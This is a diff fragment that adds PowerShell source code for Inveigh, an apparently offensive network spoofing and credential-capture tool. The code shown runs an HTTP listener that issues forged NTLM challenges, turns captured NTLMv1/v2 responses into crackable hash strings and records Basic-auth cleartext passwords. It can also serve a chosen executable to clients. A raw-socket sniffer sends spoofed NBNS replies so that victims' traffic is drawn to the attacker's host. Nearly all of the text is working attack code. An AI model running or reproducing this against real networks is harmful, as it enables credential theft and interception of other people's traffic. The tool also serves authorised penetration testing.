+            $HTTP_challenge = $HTTP_challenge_bytes -replace ' ',''
+            $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        }
+
+        $inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $HTTP_challenge)  > $null
+
+        $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
+                            0x00,0x00,0x00,0x05,0x82,0x89,0xa +
+                            $HTTP_challenge_bytes +
+                            0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
+                            0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
+                            0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,
+                            0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,
+                            0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,
+                            0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,
+                            0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,
+                            0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,
+                            0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 +
+                            $HTTP_timestamp +
+                            0x00,0x00,0x00,0x00,0x0a,0x0a
+
+        $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
+        $NTLM = 'NTLM ' + $NTLM_challenge_base64
+        $NTLM_challenge = $HTTP_challenge
+        
+        return $NTLM
+    }
+
+    $HTTP_raw_url_output = $true
+    
+    while($inveigh.running)
+    {
+        $inveigh.context = $inveigh.HTTP_listener.GetContext() 
+        $inveigh.request = $inveigh.context.Request
+        $inveigh.response = $inveigh.context.Response
+        $NTLM = 'NTLM'
+        $NTLM_auth = $false
+        $basic_auth = $false
+        
+        if($inveigh.request.IsSecureConnection)
+        {
+            $HTTP_type = "HTTPS"
+        }
+        else
+        {
+            $HTTP_type = "HTTP"
+        }
+        
+        if($inveigh.request.RawUrl -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous')
+        {
+            $inveigh.response.StatusCode = 200
+        }
+        else
+        {
+            $inveigh.response.StatusCode = 401
+        }
+
+        $HTTP_request_time = Get-Date -format 's'
+        $HTTP_source_IP = $inveigh.request.RemoteEndpoint.Address.IPAddressToString
+
+        if($HTTP_request_time -eq $HTTP_request_time_old -and $inveigh.request.RawUrl -eq $HTTP_request_raw_url_old -and $HTTP_source_IP -eq $HTTP_request_remote_endpoint_old)
+        {
+            $HTTP_raw_url_output = $false
+        }
+        else
+        {
+            $HTTP_raw_url_output = $true
+        }
+         
+        if(!$inveigh.request.headers["Authorization"] -and $inveigh.HTTP_listener.IsListening -and $HTTP_raw_url_output)
+        {
+            $inveigh.console_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from $HTTP_source_IP")
+            $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from $HTTP_source_IP")])
+        }
+
+        $HTTP_request_raw_url_old = $inveigh.request.RawUrl
+        $HTTP_request_remote_endpoint_old = $HTTP_source_IP
+        $HTTP_request_time_old = $HTTP_request_time
+            
+        [String]$authentication_header = $inveigh.request.headers.GetValues('Authorization')
+        
+        if($authentication_header.StartsWith('NTLM '))
+        {
+            $authentication_header = $authentication_header -replace 'NTLM ',''
+            [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header)
+            $inveigh.response.StatusCode = 401
+            
+            if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00')
+            {   
+                $inveigh.response.StatusCode = 401
+                $NTLM = NTLMChallengeBase64 $Challenge
+            }
+            elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00')
+            {
+                $NTLM = 'NTLM'
+                $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes
+                $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes
+                $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes
+                $HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes
+                [String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $inveigh.request.RemoteEndpoint.Port + '*'
+                $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge)
+                $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1)
+                       
+                if($HTTP_NTLM_domain_length -eq 0)
+                {
+                    $HTTP_NTLM_domain_string = ''
+                }
+                else
+                {  
+                    $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes
+                } 
+                    
+                $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes
+                $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes
+                $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes
+                $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes
+                $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes
+                $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes
+        
+                if($HTTP_NTLM_length -eq 24) # NTLMv1
+                {
+                    $NTLM_type = "NTLMv1"
+                    $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
+                    $NTLM_response = $NTLM_response.Insert(48,':')
+                    $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge
+                    
+                    if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
+                    {    
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")])
+                        $inveigh.NTLMv1_list.Add($inveigh.HTTP_NTLM_hash)
+                        
+                        if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
+                        {
+                            $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $inveigh.HTTP_NTLM_hash)
+                        }
+                        else
+                        {
+                            $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
+                        }
+                        
+                        if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
+                        {
+                            $inveigh.NTLMv1_file_queue.Add($inveigh.HTTP_NTLM_hash)
+                            $inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
+                        }
+
+                        if($inveigh.NTLMv1_username_list -notcontains ("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
+                        {
+                            $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+                        }
+
+                    }
+
+                }
+                else # NTLMv2
+                {   
+                    $NTLM_type = "NTLMv2"           
+                    $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
+                    $NTLM_response = $NTLM_response.Insert(32,':')
+                    $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response
+                    
+                    if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
+                    {
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")])
+                        $inveigh.NTLMv2_list.Add($inveigh.HTTP_NTLM_hash)
+                        
+                        if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains ("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
+                        {
+                            $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $inveigh.HTTP_NTLM_hash)
+                        }
+                        else
+                        {
+                            $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
+                        }
+                        
+                        if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains ("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))))
+                        {
+                            $inveigh.NTLMv2_file_queue.Add($inveigh.HTTP_NTLM_hash)
+                            $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
+                        }
+
+                        if($inveigh.NTLMv2_username_list -notcontains ("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
+                        {
+                            $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+                        }
+
+                    } 
+
+                }
+
+                if($inveigh.IP_capture_list -notcontains $HTTP_source_IP -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat)
+                {
+                    $inveigh.IP_capture_list.Add($HTTP_source_IP)
+                }
+                
+                $inveigh.response.StatusCode = 200
+                $NTLM_auth = $true
+                $NTLM_challenge = ""
+                $HTTP_raw_url_output = $true
+
+            }
+            else
+            {
+                $NTLM = 'NTLM'
+            }
+
+        }
+        elseif($authentication_header.StartsWith('Basic ')) # Thanks to @xorrior for the initial basic auth code
+        {
+            $inveigh.response.StatusCode = 200
+            $basic_auth = $true
+            $authentication_header = $authentication_header -replace 'Basic ',''
+            $cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($authentication_header))
+            $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP")])
+            $inveigh.cleartext_file_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + ",$HTTP_type,$cleartext_credentials")
+            $inveigh.cleartext_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + ",$HTTP_type,$cleartext_credentials")
+            $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type Basic auth cleartext credentials $cleartext_credentials captured from $HTTP_source_IP")
+
+            if($inveigh.file_output)
+            {
+                $inveigh.console_queue.Add("$HTTP_type Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file)
+            }
+                 
+        }
+
+        if(($HTTPAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -match '/wpad.dat') -or $NTLM_Auth -or $basic_auth)
+        {
+
+            if($HTTPDir -and $HTTPDefaultEXE -and $inveigh.request.RawUrl -like '*.exe' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultEXE)) -and !(Test-Path (Join-Path $HTTPDir $inveigh.request.RawUrl)))
+            {
+                [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultEXE))
+            }
+            elseif($HTTPDir)
+            {
+
+                if($HTTPDefaultFile -and !(Test-Path (Join-Path $HTTPDir $inveigh.request.RawUrl)) -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile)) -and $inveigh.request.RawUrl -notmatch '/wpad.dat')
+                {
+                    [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultFile))
+                }
+                elseif($HTTPDefaultFile -and $inveigh.request.RawUrl -eq '/' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile)))
+                {
+                    [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultFile))
+                }
+                elseif($WPADResponse -and $inveigh.request.RawUrl -match '/wpad.dat')
+                {
+                    [Byte[]]$HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($WPADResponse)
+                }
+                else
+                {
+
+                    if(Test-Path (Join-Path $HTTPDir $inveigh.request.RawUrl))
+                    {
+                        [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $inveigh.request.RawUrl))
+                    }
+                    else
+                    {
+                        [Byte[]]$HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($HTTPResponse)
+                    }
+            
+                }
+
+            }
+            else
+            {
+
+                if($inveigh.request.RawUrl -match '/wpad.dat')
+                {
+                    $inveigh.message = $WPADResponse
+                }
+                elseif($HTTPResponse)
+                {
+                    $inveigh.message = $HTTPResponse
+                }
+                else
+                {
+                    $inveigh.message = $null
+                }
+
+                [Byte[]]$HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message)
+            }
+        }
+        else
+        {
+            [Byte[]]$HTTP_buffer = $null
+        }
+
+        if(($HTTPAuth -eq 'NTLM' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'NTLM' -and $inveigh.request.RawUrl -match '/wpad.dat') -and !$NTLM_auth)
+        {
+            $inveigh.response.AddHeader("WWW-Authenticate",$NTLM)
+        }
+        elseif(($HTTPAuth -eq 'Basic' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Basic' -and $inveigh.request.RawUrl -match '/wpad.dat'))
+        {
+            $inveigh.response.AddHeader("WWW-Authenticate","Basic realm=$HTTPBasicRealm")
+        }
+        else
+        {
+            $inveigh.response.StatusCode = 200
+        }
+
+        $inveigh.response.ContentLength64 = $HTTP_buffer.Length
+        $HTTP_stream = $inveigh.response.OutputStream
+        $HTTP_stream.Write($HTTP_buffer,0,$HTTP_buffer.Length)
+        $HTTP_stream.Close()
+    }
+
+    $inveigh.HTTP_listener.Stop()
+    $inveigh.HTTP_listener.Close()
+}
+
+# Sniffer/Spoofer ScriptBlock - LLMNR/NBNS Spoofer and SMB sniffer
+$sniffer_scriptblock = 
+{
+    param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$SpooferLearning,$SpooferLearningDelay,$SpooferLearningInterval,$RunTime,$LLMNRTTL,$NBNSTTL)
+
+    $byte_in = New-Object System.Byte[] 4	
+    $byte_out = New-Object System.Byte[] 4	
+    $byte_data = New-Object System.Byte[] 4096
+    $byte_in[0] = 1
+    $byte_in[1-3] = 0
+    $byte_out[0] = 1
+    $byte_out[1-3] = 0
+    $inveigh.sniffer_socket = New-Object System.Net.Sockets.Socket([Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::IP)
+    $inveigh.sniffer_socket.SetSocketOption("IP","HeaderIncluded",$true)
+    $inveigh.sniffer_socket.ReceiveBufferSize = 1024
+    $end_point = New-Object System.Net.IPEndpoint([System.Net.IPAddress]"$IP",0)
+    $inveigh.sniffer_socket.Bind($end_point)
+    $inveigh.sniffer_socket.IOControl([System.Net.Sockets.IOControlCode]::ReceiveAll,$byte_in,$byte_out)
+    $LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL)
+    [Array]::Reverse($LLMNR_TTL_bytes)
+    $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL)
+    [Array]::Reverse($NBNS_TTL_bytes)
+    $LLMNR_learning_log = New-Object System.Collections.Generic.List[string]
+    $NBNS_learning_log = New-Object System.Collections.Generic.List[string]
+
+    if($SpooferLearningDelay)
+    {    
+        $spoofer_learning_delay = New-TimeSpan -Minutes $SpooferLearningDelay
+        $spoofer_learning_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+    }
+
+    if($RunTime)
+    {    
+        $sniffer_timeout = New-TimeSpan -Minutes $RunTime
+        $sniffer_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+    }
+
+    while($inveigh.running)
+    {
+        $packet_data = $inveigh.sniffer_socket.Receive($byte_data,0,$byte_data.Length,[System.Net.Sockets.SocketFlags]::None)
+        $memory_stream = New-Object System.IO.MemoryStream($byte_data,0,$packet_data)
+        $binary_reader = New-Object System.IO.BinaryReader($memory_stream)
+        $version_HL = $binary_reader.ReadByte()
+        $type_of_service= $binary_reader.ReadByte()
+        $total_length = DataToUInt16 $binary_reader.ReadBytes(2)
+        $identification = $binary_reader.ReadBytes(2)
+        $flags_offset = $binary_reader.ReadBytes(2)
+        $TTL = $binary_reader.ReadByte()
+        $protocol_number = $binary_reader.ReadByte()
+        $header_checksum = [System.Net.IPAddress]::NetworkToHostOrder($binary_reader.ReadInt16())
+        $source_IP_bytes = $binary_reader.ReadBytes(4)
+        $source_IP = [System.Net.IPAddress]$source_IP_bytes
+        $destination_IP_bytes = $binary_reader.ReadBytes(4)
+        $destination_IP = [System.Net.IPAddress]$destination_IP_bytes
+        $IP_version = [Int]"0x$(('{0:X}' -f $version_HL)[0])"
+        $header_length = [Int]"0x$(('{0:X}' -f $version_HL)[1])" * 4
+        
+        switch($protocol_number)
+        {
+
+            6 
+            {  # TCP
+                $source_port = DataToUInt16 $binary_reader.ReadBytes(2)
+                $destination_port = DataToUInt16 $binary_reader.ReadBytes(2)
+                $sequence_number = DataToUInt32 $binary_reader.ReadBytes(4)
+                $ack_number = DataToUInt32 $binary_reader.ReadBytes(12)
+                $TCP_header_length = [Int]"0x$(('{0:X}' -f $binary_reader.ReadByte())[0])" * 4
+                $TCP_flags = $binary_reader.ReadByte()
+                $TCP_window = DataToUInt16 $binary_reader.ReadBytes(2)
+                $TCP_checksum = [System.Net.IPAddress]::NetworkToHostOrder($binary_reader.ReadInt16())
+                $TCP_urgent_pointer = DataToUInt16 $binary_reader.ReadBytes(2)    
+                $payload_bytes = $binary_reader.ReadBytes($total_length - ($header_length + $TCP_header_length))
+
+                switch ($destination_port)
+                {
+
+                    139 
+                    {
+                        if($SMB -eq 'Y')
+                        {
+
+                            if($NTLM_challenge -and $client_IP -eq $source_IP -and $client_port -eq $source_port)
+                            {
+                                SMBNTLMResponse $payload_bytes
+                            }
+
+                            $client_IP = ""
+                            $client_port = ""
+                            $NTLM_challenge = ""
+                        
+                        }
+                    }
+
+                    445
+                    {
+                     
+                        if($SMB -eq 'Y')
+                        {
+
+                            if($NTLM_challenge -and $client_IP -eq $source_IP -and $client_port -eq $source_port)
+                            {
+                                SMBNTLMResponse $payload_bytes
+                            }
+
+                            $client_IP = ""
+                            $client_port = ""
+                            $NTLM_challenge = ""
+
+                        }
+                    
+                    }
+
+                }
+
+                # Outgoing packets
+                switch ($source_port)
+                {
+
+                    139 
+                    {
+
+                        if($SMB -eq 'Y')
+                        {   
+                            $client_IP = $destination_IP 
+                            $client_port = $destination_port
+                            $NTLM_challenge = SMBNTLMChallenge $payload_bytes
+                        }
+                    
+                    }
+
+                    445 
+                    {
+
+                        if($SMB -eq 'Y')
+                        {   
+                            $client_IP = $destination_IP 
+                            $client_port = $destination_port
+                            $NTLM_challenge = SMBNTLMChallenge $payload_bytes
+                        }
+                    
+                    }
+                
+                }
+
+            }
+                
+            17 
+            {  # UDP
+                $source_port = $binary_reader.ReadBytes(2)
+                $endpoint_source_port = DataToUInt16 ($source_port)
+                $destination_port = DataToUInt16 $binary_reader.ReadBytes(2)
+                $UDP_length = $binary_reader.ReadBytes(2)
+                $UDP_length_uint  = DataToUInt16 ($UDP_length)
+                $binary_reader.ReadBytes(2)
+                $payload_bytes = $binary_reader.ReadBytes(($UDP_length_uint - 2) * 4)
+
+                # Incoming packets 
+                switch($destination_port)
+                {
+
+                    137 # NBNS
+                    {
+                     
+                        if(([System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00' -or [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-00-00-01') -and [System.BitConverter]::ToString($payload_bytes[10..11]) -ne '00-01')
+                        {
+                            $UDP_length[0] += 12
+                        
+                            $NBNS_response_data = $payload_bytes[13..$payload_bytes.Length] +
+                                                    $NBNS_TTL_bytes +
+                                                    0x00,0x06,0x00,0x00 +
+                                                    ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
+                
+                            $NBNS_response_packet = 0x00,0x89 +
+                                                    $source_port[1,0] +
+                                                    $UDP_length[1,0] +
+                                                    0x00,0x00 +
+                                                    $payload_bytes[0,1] +
+                                                    0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 +
+                                                    $NBNS_response_data
+                
+                            $NBNS_query_type = [System.BitConverter]::ToString($payload_bytes[43..44])
+                    
+                            switch ($NBNS_query_type)
+                            {
+
+                                '41-41'
+                                {
+                                    $NBNS_query_type = '00'
+                                }
+
+                                '41-44'
+                                {
+                                    $NBNS_query_type = '03'
+                                }
+
+                                '43-41'
+                                {
+                                    $NBNS_query_type = '20'
+                                }
+
+                                '42-4C'
+                                {
+                                    $NBNS_query_type = '1B'
+                                }
+
+                                '42-4D'
+                                {
+                                    $NBNS_query_type = '1C'
+                                }
+
+                                '42-4E'
+                                {
+                                    $NBNS_query_type = '1D'
+                                }
+
+                                '42-4F'
+                                {
+                                    $NBNS_query_type = '1E'
+                                }
+
+                            }
+
+                            $NBNS_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes.Length - 4)])
+                            $NBNS_query = $NBNS_query -replace "-00",""
+                            $NBNS_query = $NBNS_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+                            $NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length)
+                            $NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA"))
+                            $NBNS_query_string_subtracted = ""
+                            $NBNS_query_string = ""
+                            $n = 0
+                            
+                            do
+                            {
+                                $NBNS_query_string_sub = (([Byte][Char]($NBNS_query_string_encoded.Substring($n,1))) - 65)
+                                $NBNS_query_string_subtracted += ([System.Convert]::ToString($NBNS_query_string_sub,16))
+                                $n += 1
+                            }
+                            until($n -gt ($NBNS_query_string_encoded.Length - 1))
+                    
+                            $n = 0
+                    
+                            do
+                            {
+                                $NBNS_query_string += ([Char]([System.Convert]::ToInt16($NBNS_query_string_subtracted.Substring($n,2),16)))
+                                $n += 2
+                            }
+                            until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15)
+
+                            $NBNS_request_ignore = $false
+
+                            if($NBNS -eq 'Y')
+                            {
+
+                                if($SpooferLearning -eq 'Y' -and $inveigh.valid_host_list -notcontains $NBNS_query_string -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00' -and $source_IP -ne $IP)
+                                {
+                                
+                                    if(($NBNS_learning_log.Exists({param($s) $s -like "20* $NBNS_query_string"})))
+                                    {
+                                        $NBNS_learning_queue_time = [DateTime]$NBNS_learning_log.Find({param($s) $s -like "20* $NBNS_query_string"}).SubString(0,19)
+
+                                        if((Get-Date) -ge $NBNS_learning_queue_time.AddMinutes($SpooferLearningInterval))
+                                        {
+                                            $NBNS_learning_log.RemoveAt($NBNS_learning_log.FindIndex({param($s) $s -like "20* $NBNS_query_string"}))
+                                            $NBNS_learning_send = $true
+                                        }
+                                        else
+                                        {
+                                            $NBNS_learning_send = $false
+                                        }
+
+                                    }
+                                    else
+                                    {           
+                                        $NBNS_learning_send = $true
+                                    }
+
+                                    if($NBNS_learning_send)
+                                    {
+                                        $NBNS_transaction_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+                                        $NBNS_transaction_ID_bytes = $NBNS_transaction_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+                                        $NBNS_transaction_ID = $NBNS_transaction_ID -replace " ","-"
+                                        $NBNS_UDP_client = new-Object System.Net.Sockets.UdpClient 137
+                                        $NBNS_hostname_bytes = $payload_bytes[13..($payload_bytes.Length - 5)]
+
+                                        $NBNS_request_packet = $NBNS_transaction_ID_bytes +
+                                                                0x01,0x10,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20 +
+                                                                $NBNS_hostname_bytes +
+                                                                0x00,0x20,0x00,0x01
+
+                                        $NBNS_learning_destination_endpoint = New-Object System.Net.IPEndpoint([IPAddress]::broadcast,137)
+                                        $NBNS_UDP_client.Connect($NBNS_learning_destination_endpoint)
+                                        $NBNS_UDP_client.Send($NBNS_request_packet,$NBNS_request_packet.Length)
+                                        $NBNS_UDP_client.Close()
+                                        $NBNS_learning_log.Add("$(Get-Date -format 's') $NBNS_transaction_ID $NBNS_query_string")
+                                        $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString)
+                                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString)])
+                                    }
+
+                                }
+                                 
+                                if(($inveigh.valid_host_list -notcontains $NBNS_query_string -or $SpooferHostsReply -contains $NBNS_query_string) -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and (
+                                !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (
+                                !$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ($NBNS_query_string.Trim() -ne '*') -and (
+                                $SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)) -and ($source_IP -ne $IP) -and (
+                                $NBNSTypes -contains $NBNS_query_type))
+                                {
+
+                                    if($SpooferLearning -eq 'N' -or !$NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
+                                    {
+                                        $NBNS_send_socket = New-Object Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp)
+                                        $NBNS_send_socket.SendBufferSize = 1024
+                                        $NBNS_destination_point = New-Object Net.IPEndpoint($source_IP,$endpoint_source_port)
+                                        $NBNS_send_socket.SendTo($NBNS_response_packet,$NBNS_destination_point)
+                                        $NBNS_send_socket.Close()
+                                        $NBNS_response_message = "- response sent"
+                                    }
+                                    else
+                                    {
+                                        $NBNS_request_ignore = $true
+                                    }
+                                    
+                                }
+                                else
+                                {
+
+                                    if($source_IP -eq $IP -and $NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
+                                    {
+                                        $NBNS_request_ignore = $true
+                                    }
+                                    elseif($NBNSTypes -notcontains $NBNS_query_type)
+                                    {
+                                        $NBNS_response_message = "- disabled NBNS type"
+                                    }
+                                    elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $NBNS_query_string)
+                                    {
+                                        $NBNS_response_message = "- $NBNS_query_string is not on reply list"
+                                    }
+                                    elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $NBNS_query_string)
+                                    {
+                                        $NBNS_response_message = "- $NBNS_query_string is on ignore list"
+                                    }
+                                    elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
+                                    {
